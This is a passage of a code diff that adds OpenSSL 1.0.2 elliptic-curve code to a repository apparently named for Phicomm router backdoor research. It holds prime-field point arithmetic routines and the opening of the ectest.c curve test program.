+    int (*field_mul) (const EC_GROUP *, BIGNUM *, const BIGNUM *,
+                      const BIGNUM *, BN_CTX *);
+    int (*field_sqr) (const EC_GROUP *, BIGNUM *, const BIGNUM *, BN_CTX *);
+    const BIGNUM *p;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *rh, *tmp, *Z4, *Z6;
+    int ret = -1;
+
+    if (EC_POINT_is_at_infinity(group, point))
+        return 1;
+
+    field_mul = group->meth->field_mul;
+    field_sqr = group->meth->field_sqr;
+    p = &group->field;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return -1;
+    }
+
+    BN_CTX_start(ctx);
+    rh = BN_CTX_get(ctx);
+    tmp = BN_CTX_get(ctx);
+    Z4 = BN_CTX_get(ctx);
+    Z6 = BN_CTX_get(ctx);
+    if (Z6 == NULL)
+        goto err;
+
+    /*-
+     * We have a curve defined by a Weierstrass equation
+     *      y^2 = x^3 + a*x + b.
+     * The point to consider is given in Jacobian projective coordinates
+     * where  (X, Y, Z)  represents  (x, y) = (X/Z^2, Y/Z^3).
+     * Substituting this and multiplying by  Z^6  transforms the above equation into
+     *      Y^2 = X^3 + a*X*Z^4 + b*Z^6.
+     * To test this, we add up the right-hand side in 'rh'.
+     */
+
+    /* rh := X^2 */
+    if (!field_sqr(group, rh, &point->X, ctx))
+        goto err;
+
+    if (!point->Z_is_one) {
+        if (!field_sqr(group, tmp, &point->Z, ctx))
+            goto err;
+        if (!field_sqr(group, Z4, tmp, ctx))
+            goto err;
+        if (!field_mul(group, Z6, Z4, tmp, ctx))
+            goto err;
+
+        /* rh := (rh + a*Z^4)*X */
+        if (group->a_is_minus3) {
+            if (!BN_mod_lshift1_quick(tmp, Z4, p))
+                goto err;
+            if (!BN_mod_add_quick(tmp, tmp, Z4, p))
+                goto err;
+            if (!BN_mod_sub_quick(rh, rh, tmp, p))
+                goto err;
+            if (!field_mul(group, rh, rh, &point->X, ctx))
+                goto err;
+        } else {
+            if (!field_mul(group, tmp, Z4, &group->a, ctx))
+                goto err;
+            if (!BN_mod_add_quick(rh, rh, tmp, p))
+                goto err;
+            if (!field_mul(group, rh, rh, &point->X, ctx))
+                goto err;
+        }
+
+        /* rh := rh + b*Z^6 */
+        if (!field_mul(group, tmp, &group->b, Z6, ctx))
+            goto err;
+        if (!BN_mod_add_quick(rh, rh, tmp, p))
+            goto err;
+    } else {
+        /* point->Z_is_one */
+
+        /* rh := (rh + a)*X */
+        if (!BN_mod_add_quick(rh, rh, &group->a, p))
+            goto err;
+        if (!field_mul(group, rh, rh, &point->X, ctx))
+            goto err;
+        /* rh := rh + b */
+        if (!BN_mod_add_quick(rh, rh, &group->b, p))
+            goto err;
+    }
+
+    /* 'lh' := Y^2 */
+    if (!field_sqr(group, tmp, &point->Y, ctx))
+        goto err;
+
+    ret = (0 == BN_ucmp(tmp, rh));
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_cmp(const EC_GROUP *group, const EC_POINT *a,
+                      const EC_POINT *b, BN_CTX *ctx)
+{
+    /*-
+     * return values:
+     *  -1   error
+     *   0   equal (in affine coordinates)
+     *   1   not equal
+     */
+
+    int (*field_mul) (const EC_GROUP *, BIGNUM *, const BIGNUM *,
+                      const BIGNUM *, BN_CTX *);
+    int (*field_sqr) (const EC_GROUP *, BIGNUM *, const BIGNUM *, BN_CTX *);
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *tmp1, *tmp2, *Za23, *Zb23;
+    const BIGNUM *tmp1_, *tmp2_;
+    int ret = -1;
+
+    if (EC_POINT_is_at_infinity(group, a)) {
+        return EC_POINT_is_at_infinity(group, b) ? 0 : 1;
+    }
+
+    if (EC_POINT_is_at_infinity(group, b))
+        return 1;
+
+    if (a->Z_is_one && b->Z_is_one) {
+        return ((BN_cmp(&a->X, &b->X) == 0)
+                && BN_cmp(&a->Y, &b->Y) == 0) ? 0 : 1;
+    }
+
+    field_mul = group->meth->field_mul;
+    field_sqr = group->meth->field_sqr;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return -1;
+    }
+
+    BN_CTX_start(ctx);
+    tmp1 = BN_CTX_get(ctx);
+    tmp2 = BN_CTX_get(ctx);
+    Za23 = BN_CTX_get(ctx);
+    Zb23 = BN_CTX_get(ctx);
+    if (Zb23 == NULL)
+        goto end;
+
+    /*-
+     * We have to decide whether
+     *     (X_a/Z_a^2, Y_a/Z_a^3) = (X_b/Z_b^2, Y_b/Z_b^3),
+     * or equivalently, whether
+     *     (X_a*Z_b^2, Y_a*Z_b^3) = (X_b*Z_a^2, Y_b*Z_a^3).
+     */
+
+    if (!b->Z_is_one) {
+        if (!field_sqr(group, Zb23, &b->Z, ctx))
+            goto end;
+        if (!field_mul(group, tmp1, &a->X, Zb23, ctx))
+            goto end;
+        tmp1_ = tmp1;
+    } else
+        tmp1_ = &a->X;
+    if (!a->Z_is_one) {
+        if (!field_sqr(group, Za23, &a->Z, ctx))
+            goto end;
+        if (!field_mul(group, tmp2, &b->X, Za23, ctx))
+            goto end;
+        tmp2_ = tmp2;
+    } else
+        tmp2_ = &b->X;
+
+    /* compare  X_a*Z_b^2  with  X_b*Z_a^2 */
+    if (BN_cmp(tmp1_, tmp2_) != 0) {
+        ret = 1;                /* points differ */
+        goto end;
+    }
+
+    if (!b->Z_is_one) {
+        if (!field_mul(group, Zb23, Zb23, &b->Z, ctx))
+            goto end;
+        if (!field_mul(group, tmp1, &a->Y, Zb23, ctx))
+            goto end;
+        /* tmp1_ = tmp1 */
+    } else
+        tmp1_ = &a->Y;
+    if (!a->Z_is_one) {
+        if (!field_mul(group, Za23, Za23, &a->Z, ctx))
+            goto end;
+        if (!field_mul(group, tmp2, &b->Y, Za23, ctx))
+            goto end;
+        /* tmp2_ = tmp2 */
+    } else
+        tmp2_ = &b->Y;
+
+    /* compare  Y_a*Z_b^3  with  Y_b*Z_a^3 */
+    if (BN_cmp(tmp1_, tmp2_) != 0) {
+        ret = 1;                /* points differ */
+        goto end;
+    }
+
+    /* points are equal */
+    ret = 0;
+
+ end:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_make_affine(const EC_GROUP *group, EC_POINT *point,
+                              BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y;
+    int ret = 0;
+
+    if (point->Z_is_one || EC_POINT_is_at_infinity(group, point))
+        return 1;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    if (y == NULL)
+        goto err;
+
+    if (!EC_POINT_get_affine_coordinates_GFp(group, point, x, y, ctx))
+        goto err;
+    if (!EC_POINT_set_affine_coordinates_GFp(group, point, x, y, ctx))
+        goto err;
+    if (!point->Z_is_one) {
+        ECerr(EC_F_EC_GFP_SIMPLE_MAKE_AFFINE, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_points_make_affine(const EC_GROUP *group, size_t num,
+                                     EC_POINT *points[], BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *tmp, *tmp_Z;
+    BIGNUM **prod_Z = NULL;
+    size_t i;
+    int ret = 0;
+
+    if (num == 0)
+        return 1;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    tmp = BN_CTX_get(ctx);
+    tmp_Z = BN_CTX_get(ctx);
+    if (tmp == NULL || tmp_Z == NULL)
+        goto err;
+
+    prod_Z = OPENSSL_malloc(num * sizeof prod_Z[0]);
+    if (prod_Z == NULL)
+        goto err;
+    for (i = 0; i < num; i++) {
+        prod_Z[i] = BN_new();
+        if (prod_Z[i] == NULL)
+            goto err;
+    }
+
+    /*
+     * Set each prod_Z[i] to the product of points[0]->Z .. points[i]->Z,
+     * skipping any zero-valued inputs (pretend that they're 1).
+     */
+
+    if (!BN_is_zero(&points[0]->Z)) {
+        if (!BN_copy(prod_Z[0], &points[0]->Z))
+            goto err;
+    } else {
+        if (group->meth->field_set_to_one != 0) {
+            if (!group->meth->field_set_to_one(group, prod_Z[0], ctx))
+                goto err;
+        } else {
+            if (!BN_one(prod_Z[0]))
+                goto err;
+        }
+    }
+
+    for (i = 1; i < num; i++) {
+        if (!BN_is_zero(&points[i]->Z)) {
+            if (!group->meth->field_mul(group, prod_Z[i], prod_Z[i - 1],
+                                        &points[i]->Z, ctx))
+                goto err;
+        } else {
+            if (!BN_copy(prod_Z[i], prod_Z[i - 1]))
+                goto err;
+        }
+    }
+
+    /*
+     * Now use a single explicit inversion to replace every non-zero
+     * points[i]->Z by its inverse.
+     */
+
+    if (!BN_mod_inverse(tmp, prod_Z[num - 1], &group->field, ctx)) {
+        ECerr(EC_F_EC_GFP_SIMPLE_POINTS_MAKE_AFFINE, ERR_R_BN_LIB);
+        goto err;
+    }
+    if (group->meth->field_encode != 0) {
+        /*
+         * In the Montgomery case, we just turned R*H (representing H) into
+         * 1/(R*H), but we need R*(1/H) (representing 1/H); i.e. we need to
+         * multiply by the Montgomery factor twice.
+         */
+        if (!group->meth->field_encode(group, tmp, tmp, ctx))
+            goto err;
+        if (!group->meth->field_encode(group, tmp, tmp, ctx))
+            goto err;
+    }
+
+    for (i = num - 1; i > 0; --i) {
+        /*
+         * Loop invariant: tmp is the product of the inverses of points[0]->Z
+         * .. points[i]->Z (zero-valued inputs skipped).
+         */
+        if (!BN_is_zero(&points[i]->Z)) {
+            /*
+             * Set tmp_Z to the inverse of points[i]->Z (as product of Z
+             * inverses 0 .. i, Z values 0 .. i - 1).
+             */
+            if (!group->
+                meth->field_mul(group, tmp_Z, prod_Z[i - 1], tmp, ctx))
+                goto err;
+            /*
+             * Update tmp to satisfy the loop invariant for i - 1.
+             */
+            if (!group->meth->field_mul(group, tmp, tmp, &points[i]->Z, ctx))
+                goto err;
+            /* Replace points[i]->Z by its inverse. */
+            if (!BN_copy(&points[i]->Z, tmp_Z))
+                goto err;
+        }
+    }
+
+    if (!BN_is_zero(&points[0]->Z)) {
+        /* Replace points[0]->Z by its inverse. */
+        if (!BN_copy(&points[0]->Z, tmp))
+            goto err;
+    }
+
+    /* Finally, fix up the X and Y coordinates for all points. */
+
+    for (i = 0; i < num; i++) {
+        EC_POINT *p = points[i];
+
+        if (!BN_is_zero(&p->Z)) {
+            /* turn  (X, Y, 1/Z)  into  (X/Z^2, Y/Z^3, 1) */
+
+            if (!group->meth->field_sqr(group, tmp, &p->Z, ctx))
+                goto err;
+            if (!group->meth->field_mul(group, &p->X, &p->X, tmp, ctx))
+                goto err;
+
+            if (!group->meth->field_mul(group, tmp, tmp, &p->Z, ctx))
+                goto err;
+            if (!group->meth->field_mul(group, &p->Y, &p->Y, tmp, ctx))
+                goto err;
+
+            if (group->meth->field_set_to_one != 0) {
+                if (!group->meth->field_set_to_one(group, &p->Z, ctx))
+                    goto err;
+            } else {
+                if (!BN_one(&p->Z))
+                    goto err;
+            }
+            p->Z_is_one = 1;
+        }
+    }
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (prod_Z != NULL) {
+        for (i = 0; i < num; i++) {
+            if (prod_Z[i] == NULL)
+                break;
+            BN_clear_free(prod_Z[i]);
+        }
+        OPENSSL_free(prod_Z);
+    }
+    return ret;
+}
+
+int ec_GFp_simple_field_mul(const EC_GROUP *group, BIGNUM *r, const BIGNUM *a,
+                            const BIGNUM *b, BN_CTX *ctx)
+{
+    return BN_mod_mul(r, a, b, &group->field, ctx);
+}
+
+int ec_GFp_simple_field_sqr(const EC_GROUP *group, BIGNUM *r, const BIGNUM *a,
+                            BN_CTX *ctx)
+{
+    return BN_mod_sqr(r, a, &group->field, ctx);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ectest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ectest.c
new file mode 100644
index 0000000..a18b327
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ectest.c
@@ -0,0 +1,1861 @@
+/* crypto/ec/ectest.c */
+/*
+ * Originally written by Bodo Moeller for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The elliptic curve binary polynomial software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#ifdef FLAT_INC
+# include "e_os.h"
+#else
+# include "../e_os.h"
+#endif
+#include <string.h>
+#include <time.h>
+
+#ifdef OPENSSL_NO_EC
+int main(int argc, char *argv[])
+{
+    puts("Elliptic curves are disabled.");
+    return 0;
+}
+#else
+
+# include <openssl/ec.h>
+# ifndef OPENSSL_NO_ENGINE
+#  include <openssl/engine.h>
+# endif
+# include <openssl/err.h>
+# include <openssl/obj_mac.h>
+# include <openssl/objects.h>
+# include <openssl/rand.h>
+# include <openssl/bn.h>
+# include <openssl/opensslconf.h>
+
+# if defined(_MSC_VER) && defined(_MIPS_) && (_MSC_VER/100==12)
+/* suppress "too big too optimize" warning */
+#  pragma warning(disable:4959)
+# endif
+
+# define ABORT do { \
+        fflush(stdout); \
+        fprintf(stderr, "%s:%d: ABORT\n", __FILE__, __LINE__); \
+        ERR_print_errors_fp(stderr); \
+        EXIT(1); \
+} while (0)
+
+# define TIMING_BASE_PT 0
+# define TIMING_RAND_PT 1
+# define TIMING_SIMUL 2
+
+# if 0
+static void timings(EC_GROUP *group, int type, BN_CTX *ctx)
+{
+    clock_t clck;
+    int i, j;
+    BIGNUM *s;
+    BIGNUM *r[10], *r0[10];
+    EC_POINT *P;
+
+    s = BN_new();
+    if (s == NULL)
+        ABORT;
+
+    fprintf(stdout, "Timings for %d-bit field, ", EC_GROUP_get_degree(group));
+    if (!EC_GROUP_get_order(group, s, ctx))
+        ABORT;
+    fprintf(stdout, "%d-bit scalars ", (int)BN_num_bits(s));
+    fflush(stdout);
+
+    P = EC_POINT_new(group);
+    if (P == NULL)
+        ABORT;
+    EC_POINT_copy(P, EC_GROUP_get0_generator(group));
+
+    for (i = 0; i < 10; i++) {
+        if ((r[i] = BN_new()) == NULL)
+            ABORT;
+        if (!BN_pseudo_rand(r[i], BN_num_bits(s), 0, 0))
+            ABORT;
+        if (type != TIMING_BASE_PT) {
+            if ((r0[i] = BN_new()) == NULL)
+                ABORT;
+            if (!BN_pseudo_rand(r0[i], BN_num_bits(s), 0, 0))
+                ABORT;
+        }
+    }
+
+    clck = clock();
+    for (i = 0; i < 10; i++) {
+        for (j = 0; j < 10; j++) {
+            if (!EC_POINT_mul
+                (group, P, (type != TIMING_RAND_PT) ? r[i] : NULL,
+                 (type != TIMING_BASE_PT) ? P : NULL,
+                 (type != TIMING_BASE_PT) ? r0[i] : NULL, ctx))
+                ABORT;
+        }
+    }
+    clck = clock() - clck;
+
+    fprintf(stdout, "\n");
+
+#  ifdef CLOCKS_PER_SEC
+    /*
+     * "To determine the time in seconds, the value returned by the clock
+     * function should be divided by the value of the macro CLOCKS_PER_SEC."
+     * -- ISO/IEC 9899
+     */
+#   define UNIT "s"
+#  else
+    /*
+     * "`CLOCKS_PER_SEC' undeclared (first use this function)" -- cc on
+     * NeXTstep/OpenStep
+     */
+#   define UNIT "units"
+#   define CLOCKS_PER_SEC 1
+#  endif
+
+    if (type == TIMING_BASE_PT) {
+        fprintf(stdout, "%i %s in %.2f " UNIT "\n", i * j,
+                "base point multiplications", (double)clck / CLOCKS_PER_SEC);
+    } else if (type == TIMING_RAND_PT) {
+        fprintf(stdout, "%i %s in %.2f " UNIT "\n", i * j,
+                "random point multiplications",
+                (double)clck / CLOCKS_PER_SEC);
+    } else if (type == TIMING_SIMUL) {
+        fprintf(stdout, "%i %s in %.2f " UNIT "\n", i * j,
+                "s*P+t*Q operations", (double)clck / CLOCKS_PER_SEC);
+    }
+    fprintf(stdout, "average: %.4f " UNIT "\n",
+            (double)clck / (CLOCKS_PER_SEC * i * j));
+
+    EC_POINT_free(P);
+    BN_free(s);
+    for (i = 0; i < 10; i++) {
+        BN_free(r[i]);
+        if (type != TIMING_BASE_PT)
+            BN_free(r0[i]);
+    }
+}
+# endif
+
+/* test multiplication with group order, long and negative scalars */
+static void group_order_tests(EC_GROUP *group)
+{
+    BIGNUM *n1, *n2, *order;
+    EC_POINT *P = EC_POINT_new(group);
+    EC_POINT *Q = EC_POINT_new(group);
+    BN_CTX *ctx = BN_CTX_new();
+    int i;
+
+    n1 = BN_new();
+    n2 = BN_new();
+    order = BN_new();
+    fprintf(stdout, "verify group order ...");
+    fflush(stdout);
+    if (!EC_GROUP_get_order(group, order, ctx))
+        ABORT;
+    if (!EC_POINT_mul(group, Q, order, NULL, NULL, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, Q))
+        ABORT;
+    fprintf(stdout, ".");
+    fflush(stdout);
+    if (!EC_GROUP_precompute_mult(group, ctx))
+        ABORT;
+    if (!EC_POINT_mul(group, Q, order, NULL, NULL, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, Q))
+        ABORT;
+    fprintf(stdout, " ok\n");
+    fprintf(stdout, "long/negative scalar tests ");
+    for (i = 1; i <= 2; i++) {
+        const BIGNUM *scalars[6];
+        const EC_POINT *points[6];
+
+        fprintf(stdout, i == 1 ?
+                "allowing precomputation ... " :
+                "without precomputation ... ");
+        if (!BN_set_word(n1, i))
+            ABORT;
+        /*
+         * If i == 1, P will be the predefined generator for which
+         * EC_GROUP_precompute_mult has set up precomputation.
+         */
+        if (!EC_POINT_mul(group, P, n1, NULL, NULL, ctx))
+            ABORT;
+
+        if (!BN_one(n1))
+            ABORT;
+        /* n1 = 1 - order */
+        if (!BN_sub(n1, n1, order))
+            ABORT;
+        if (!EC_POINT_mul(group, Q, NULL, P, n1, ctx))
+            ABORT;
+        if (0 != EC_POINT_cmp(group, Q, P, ctx))
+            ABORT;
+
+        /* n2 = 1 + order */
+        if (!BN_add(n2, order, BN_value_one()))
+            ABORT;
+        if (!EC_POINT_mul(group, Q, NULL, P, n2, ctx))
+            ABORT;
+        if (0 != EC_POINT_cmp(group, Q, P, ctx))
+            ABORT;
+
+        /* n2 = (1 - order) * (1 + order) = 1 - order^2 */
+        if (!BN_mul(n2, n1, n2, ctx))
+            ABORT;
+        if (!EC_POINT_mul(group, Q, NULL, P, n2, ctx))
+            ABORT;
+        if (0 != EC_POINT_cmp(group, Q, P, ctx))
+            ABORT;
+
+        /* n2 = order^2 - 1 */
+        BN_set_negative(n2, 0);
+        if (!EC_POINT_mul(group, Q, NULL, P, n2, ctx))
+            ABORT;
+        /* Add P to verify the result. */
+        if (!EC_POINT_add(group, Q, Q, P, ctx))
+            ABORT;
+        if (!EC_POINT_is_at_infinity(group, Q))
+            ABORT;
+
+        /* Exercise EC_POINTs_mul, including corner cases. */
+        if (EC_POINT_is_at_infinity(group, P))
+            ABORT;
+        scalars[0] = n1;
+        points[0] = Q;          /* => infinity */
+        scalars[1] = n2;
+        points[1] = P;          /* => -P */
+        scalars[2] = n1;
+        points[2] = Q;          /* => infinity */
+        scalars[3] = n2;
+        points[3] = Q;          /* => infinity */
+        scalars[4] = n1;
+        points[4] = P;          /* => P */
+        scalars[5] = n2;
+        points[5] = Q;          /* => infinity */
+        if (!EC_POINTs_mul(group, P, NULL, 6, points, scalars, ctx))
+            ABORT;
+        if (!EC_POINT_is_at_infinity(group, P))
+            ABORT;
+    }
+    fprintf(stdout, "ok\n");
+
+    EC_POINT_free(P);
+    EC_POINT_free(Q);
+    BN_free(n1);
+    BN_free(n2);
+    BN_free(order);
+    BN_CTX_free(ctx);
+}
+
+static void prime_field_tests(void)
+{
+    BN_CTX *ctx = NULL;
+    BIGNUM *p, *a, *b;
+    EC_GROUP *group;
+    EC_GROUP *P_160 = NULL, *P_192 = NULL, *P_224 = NULL, *P_256 =
+        NULL, *P_384 = NULL, *P_521 = NULL;
+    EC_POINT *P, *Q, *R;
+    BIGNUM *x, *y, *z;
+    unsigned char buf[100];
+    size_t i, len;
+    int k;
+
+# if 1                          /* optional */
+    ctx = BN_CTX_new();
+    if (!ctx)
+        ABORT;
+# endif
+
+    p = BN_new();
+    a = BN_new();
+    b = BN_new();
+    if (!p || !a || !b)
+        ABORT;
+
+    if (!BN_hex2bn(&p, "17"))
+        ABORT;
+    if (!BN_hex2bn(&a, "1"))
+        ABORT;
+    if (!BN_hex2bn(&b, "1"))
+        ABORT;
+
+    group = EC_GROUP_new(EC_GFp_mont_method()); /* applications should use
+                                                 * EC_GROUP_new_curve_GFp so
+                                                 * that the library gets to
+                                                 * choose the EC_METHOD */
+    if (!group)
+        ABORT;
+
+    if (!EC_GROUP_set_curve_GFp(group, p, a, b, ctx))
+        ABORT;
+
+    {
+        EC_GROUP *tmp;
+        tmp = EC_GROUP_new(EC_GROUP_method_of(group));
+        if (!tmp)
+            ABORT;
+        if (!EC_GROUP_copy(tmp, group))
+            ABORT;
+        EC_GROUP_free(group);
+        group = tmp;
+    }
+
+    if (!EC_GROUP_get_curve_GFp(group, p, a, b, ctx))
+        ABORT;
+
+    fprintf(stdout,
+            "Curve defined by Weierstrass equation\n     y^2 = x^3 + a*x + b  (mod 0x");
+    BN_print_fp(stdout, p);
+    fprintf(stdout, ")\n     a = 0x");
+    BN_print_fp(stdout, a);
+    fprintf(stdout, "\n     b = 0x");
+    BN_print_fp(stdout, b);
+    fprintf(stdout, "\n");
+
+    P = EC_POINT_new(group);
+    Q = EC_POINT_new(group);
+    R = EC_POINT_new(group);
+    if (!P || !Q || !R)
+        ABORT;
+
+    if (!EC_POINT_set_to_infinity(group, P))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, P))
+        ABORT;
+
+    buf[0] = 0;
+    if (!EC_POINT_oct2point(group, Q, buf, 1, ctx))
+        ABORT;
+
+    if (!EC_POINT_add(group, P, P, Q, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, P))
+        ABORT;
+
+    x = BN_new();
+    y = BN_new();
+    z = BN_new();
+    if (!x || !y || !z)
+        ABORT;
+
+    if (!BN_hex2bn(&x, "D"))
+        ABORT;
+    if (!EC_POINT_set_compressed_coordinates_GFp(group, Q, x, 1, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, Q, ctx)) {
+        if (!EC_POINT_get_affine_coordinates_GFp(group, Q, x, y, ctx))
+            ABORT;
+        fprintf(stderr, "Point is not on curve: x = 0x");
+        BN_print_fp(stderr, x);
+        fprintf(stderr, ", y = 0x");
+        BN_print_fp(stderr, y);
+        fprintf(stderr, "\n");
+        ABORT;
+    }
+
+    fprintf(stdout, "A cyclic subgroup:\n");
+    k = 100;
+    do {
+        if (k-- == 0)
+            ABORT;
+
+        if (EC_POINT_is_at_infinity(group, P))
+            fprintf(stdout, "     point at infinity\n");
+        else {
+            if (!EC_POINT_get_affine_coordinates_GFp(group, P, x, y, ctx))
+                ABORT;
+
+            fprintf(stdout, "     x = 0x");
+            BN_print_fp(stdout, x);
+            fprintf(stdout, ", y = 0x");
+            BN_print_fp(stdout, y);
+            fprintf(stdout, "\n");
+        }
+
+        if (!EC_POINT_copy(R, P))
+            ABORT;
+        if (!EC_POINT_add(group, P, P, Q, ctx))
+            ABORT;
+
+# if 0                          /* optional */
+        {
+            EC_POINT *points[3];
+
+            points[0] = R;
+            points[1] = Q;
+            points[2] = P;
+            if (!EC_POINTs_make_affine(group, 2, points, ctx))
+                ABORT;
+        }
+# endif
+
+    }
+    while (!EC_POINT_is_at_infinity(group, P));
+
+    if (!EC_POINT_add(group, P, Q, R, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, P))
+        ABORT;
+
+    len =
+        EC_POINT_point2oct(group, Q, POINT_CONVERSION_COMPRESSED, buf,
+                           sizeof buf, ctx);
+    if (len == 0)
+        ABORT;
+    if (!EC_POINT_oct2point(group, P, buf, len, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, Q, ctx))
+        ABORT;
+    fprintf(stdout, "Generator as octet string, compressed form:\n     ");
+    for (i = 0; i < len; i++)
+        fprintf(stdout, "%02X", buf[i]);
+
+    len =
+        EC_POINT_point2oct(group, Q, POINT_CONVERSION_UNCOMPRESSED, buf,
+                           sizeof buf, ctx);
+    if (len == 0)
+        ABORT;
+    if (!EC_POINT_oct2point(group, P, buf, len, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, Q, ctx))
+        ABORT;
+    fprintf(stdout, "\nGenerator as octet string, uncompressed form:\n     ");
+    for (i = 0; i < len; i++)
+        fprintf(stdout, "%02X", buf[i]);
+
+    len =
+        EC_POINT_point2oct(group, Q, POINT_CONVERSION_HYBRID, buf, sizeof buf,
+                           ctx);
+    if (len == 0)
+        ABORT;
+    if (!EC_POINT_oct2point(group, P, buf, len, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, Q, ctx))
+        ABORT;
+    fprintf(stdout, "\nGenerator as octet string, hybrid form:\n     ");
+    for (i = 0; i < len; i++)
+        fprintf(stdout, "%02X", buf[i]);
+
+    if (!EC_POINT_get_Jprojective_coordinates_GFp(group, R, x, y, z, ctx))
+        ABORT;
+    fprintf(stdout,
+            "\nA representation of the inverse of that generator in\nJacobian projective coordinates:\n     X = 0x");
+    BN_print_fp(stdout, x);
+    fprintf(stdout, ", Y = 0x");
+    BN_print_fp(stdout, y);
+    fprintf(stdout, ", Z = 0x");
+    BN_print_fp(stdout, z);
+    fprintf(stdout, "\n");
+
+    if (!EC_POINT_invert(group, P, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, R, ctx))
+        ABORT;
+
+    /*
+     * Curve secp160r1 (Certicom Research SEC 2 Version 1.0, section 2.4.2,
+     * 2000) -- not a NIST curve, but commonly used
+     */
+
+    if (!BN_hex2bn(&p, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF7FFFFFFF"))
+        ABORT;
+    if (1 != BN_is_prime_ex(p, BN_prime_checks, ctx, NULL))
+        ABORT;
+    if (!BN_hex2bn(&a, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF7FFFFFFC"))
+        ABORT;
+    if (!BN_hex2bn(&b, "1C97BEFC54BD7A8B65ACF89F81D4D4ADC565FA45"))
+        ABORT;
+    if (!EC_GROUP_set_curve_GFp(group, p, a, b, ctx))
+        ABORT;
